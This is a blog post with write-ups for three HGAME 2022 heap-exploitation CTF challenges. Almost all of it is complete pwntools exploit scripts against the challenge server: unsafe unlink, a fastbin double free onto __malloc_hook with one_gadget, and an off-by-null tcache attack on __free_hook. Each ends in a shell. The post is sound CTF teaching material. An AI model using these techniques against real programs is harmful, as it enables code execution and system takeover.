HGAME 2022 Week3 Pwn

三个最简单的堆模板题,真是一周比一周简单了......

changeable_note

unsafe unlink模板题,当然用其他方法也能做。(感谢狒猩橙写的exp)

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

s = remote('chuj.top',52533)
# s = process('./note')
libc = ELF('./libc-2.23.so')
elf = ELF('./note')

def getYZM(s64):
	assert len(s64)==64
	table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	s64=s64.decode()
	for i in table:
		for j in table:
			for k in table:
				for l in table:
					st=(i+j+k+l).encode()
					if sha256(st).hexdigest()==s64:
						return st

def add(index,size,content):
	s.sendlineafter(b'>> ' , b'1')
	s.sendlineafter(b'>> ' , str(index))
	s.sendlineafter(b'>> ' , str(size))
	s.sendafter(b'>> ' , content)

def edit(index,content):
	s.sendlineafter(b'>> ' , b'2')
	s.sendlineafter(b'>> ' , str(index))
	s.sendline(content)

def delete(index):
	s.sendlineafter(b'>> ' , b'3')
	s.sendlineafter(b'>> ' , str(index))

note_addr = 0x4040C0
fd = note_addr - 0x18
bk = note_addr - 0x10

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']

sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

add(0 , 0x30 , b'a')
add(1 , 0xf0 , b'a')
add(2 , 0x30 , b'/bin/sh\x00')
add(3 , 0x30 , b'a')

payload = p64(0) + p64(0x31) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x100) 
edit(0 , payload)
delete(1)

edit(0 , b'a'*0x18 + p64(atoi_got) + p64(free_got) + p64(atoi_got))
edit(1 , p32(puts_plt) + b'\x00')

delete(0)

libc_base = u64(s.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']

edit(2 ,p64(system_addr))

s.sendline(b"/bin/sh\x00")
s.interactive()

elder_note

__realloc_hook配合__malloc_hook调整栈帧,打one_gadget。(感谢狒猩橙写的exp)

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

s = remote('chuj.top',52703)
libc = ELF('./libc-2.23.so')
elf = ELF('./note')

def getYZM(s64):
	assert len(s64)==64
	table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	s64=s64.decode()
	for i in table:
		for j in table:
			for k in table:
				for l in table:
					st=(i+j+k+l).encode()
					if sha256(st).hexdigest()==s64:
						return st

def add(index,size,content):
	s.sendlineafter(b'>> ' , b'1')
	s.sendlineafter(b'>> ' , str(index))
	s.sendlineafter(b'>> ' , str(size))
	s.sendafter(b'>> ' , content)

def show(index):
	s.sendlineafter(b'>> ' , b'2')
	s.sendlineafter(b'>> ' , str(index))

def delete(index):
	s.sendlineafter(b'>> ' , b'3')
	s.sendlineafter(b'>> ' , str(index))

sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

add(0 , 0x60 , b'a')
add(1 , 0x60 , b'a')
add(2 , 0x80 , b'a')
add(3 , 0x60 , b'a')

delete(2)
show(2)

libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
onegadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + onegadget[1]
success('libc_base=>' + hex(libc_base))

delete(0)
delete(1)
delete(0)

add(0 , 0x60 , p64(__malloc_hook-0x23))
add(1 , 0x60 , b'a')
add(4 , 0x60 , b'a')
add(5 , 0x60 , b'a'*0xb + p64(one_gadget) + p64(realloc))

s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(8))
s.sendlineafter(b'>> ' , str(32))
s.interactive()

sized_note

off by null模板水题,随便写写就行了。

from pwn import *
import string
from hashlib import sha256
context(arch = 'amd64', os = 'linux', log_level = 'debug')

#io = process("./note")
io = remote("chuj.top", 52838)
#libc = ELF("./libc-2.27.so")
libc = ELF("./libc.so.6")

table = string.digits + string.ascii_letters
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)
prefix = ""
f = 0
for a in table:
    for b in table:
        for c in table:
            for d in table:
                sha = (a + b + c + d).encode()
                if sha256(sha).hexdigest() == tar:
                    prefix = a + b + c + d
                    f = 1
                    break
            if f == 1 :
                break
        if f == 1 :
            break
    if f == 1 :
        break
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())

def add(index, size, content):
	io.sendlineafter(">> ", b'1')
	io.sendlineafter(">> ", str(index))
	io.sendlineafter(">> ", str(size))
	io.sendafter(">> ", content)

def show(index):
	io.sendlineafter(">> ", b'2')
	io.sendlineafter(">> ", str(index))

def delete(index):
	io.sendlineafter(">> ", b'3')
	io.sendlineafter(">> ", str(index))

def edit(index, content):
	io.sendlineafter(">> ", b'4')
	io.sendlineafter(">> ", str(index))
	io.send(content)

def quit():
	io.sendlineafter(">> ", b'5')

if __name__ == '__main__':
	for i in range(8):
		add(i, 0xf0, b'\n')
	add(8, 0x50, b'\n')
	add(9, 0x50, b'\n')
	add(10, 0x28, b'\n')
	add(11, 0xf0, b'\n')
	add(12, 0x20, b'\n')
	for i in range(7):
		delete(i)
	edit(10, b'a'*0x20 + p64(0x1f0))
	delete(7)
	delete(11)
	add(11, 0x100, b'\n')
	add(12, 0x40, b'\n')
	show(9)
	libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
	success("libc_base:\t" + hex(libc.address))
	add(13, 0x50, b'\n')
	delete(9)
	edit(13, p64(libc.sym['__free_hook'] - 8))
	add(14, 0x50, b'\n')
	add(15, 0x50, b'/bin/sh\x00' + p64(libc.sym['system']))
	delete(15)
	io.interactive()
posted @ 2022-02-13 11:59  winmt  阅读(136)  评论(2编辑  收藏  举报